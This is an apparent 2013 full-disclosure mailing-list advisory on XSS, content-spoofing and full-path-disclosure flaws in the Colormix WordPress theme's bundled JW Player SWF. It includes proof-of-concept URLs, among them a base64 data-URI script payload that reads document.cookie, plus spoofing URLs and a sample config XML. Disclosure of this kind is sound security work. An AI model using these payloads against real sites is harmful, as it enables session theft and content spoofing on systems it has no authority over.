WordPress Colormix XSS / Content Spoofing / Path Disclosure

`Hello list!  
  
Last year I've disclosed vulnerabilities in JW Player and in RokBox. Which   
were fixed by the developers - JW Player developers fixed one hole and   
promised to fix others later and RokBox fixed all holes (but it was   
questionable how they fixed holes related to JW Player).  
  
In December I've wrote about 47 RocketTheme's themes for WordPress (which   
contain RokBox). Besides their themes I've found in December similar   
vulnerabilities in multiple themes of other developers (including custom   
themes).  
  
Now I'll inform you about multiple vulnerabilities in Colormix theme for   
WordPress. These are Cross-Site Scripting, Content Spoofing and Full path   
disclosure vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
Affected all versions of Colormix theme for WordPress.  
  
Other themes of this developer can be vulnerable as well.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Wordpress Themes Park  
http://www.wordpressthemespark.com  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B  
  
Content Spoofing (WASC-12):  
  
In parameter file there can be set as video, as audio files.  
  
Swf-file of JW Player accepts arbitrary addresses in parameters file and   
image, which allows to spoof content of flash - i.e. by setting addresses of   
video (audio) and/or image files from other site.  
  
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF  
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg  
  
Content Spoofing (WASC-12):  
  
Swf-file of JW Player accepts arbitrary addresses in parameter config, which   
allows to spoof content of flash - i.e. by setting address of config file   
from other site (parameters file and image in xml-file accept arbitrary   
addresses). For loading of config file from other site it needs to have   
crossdomain.xml.  
  
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml  
  
1.xml  
  
<config>  
<file>1.flv</file>  
<image>1.jpg</image>  
</config>  
  
Content Spoofing (WASC-12):  
  
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site  
  
Full path disclosure (WASC-13):  
  
There are FPD In folder http://site/wp-content/themes/colormix/ in index.php   
and many other php-files of theme.  
  
------------  
Timeline:  
------------   
  
2012.05.29 - informed developers of JW Player.  
2012.08.18 - informed developers about new holes in JW Player Pro.  
2012.08.28 - informed developers of Rokbox.  
2012.12.14 - disclosed at my site about Rokbox.  
2012.12.23 - disclosed to the lists the first part of vulnerable themes by   
RocketTheme for WordPress.  
2012.12.30 - disclosed to the lists the second part of vulnerable themes by   
RocketTheme for WordPress.  
2013.04.18 - disclosed at my site about Colormix theme   
(http://websecurity.com.ua/6457/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`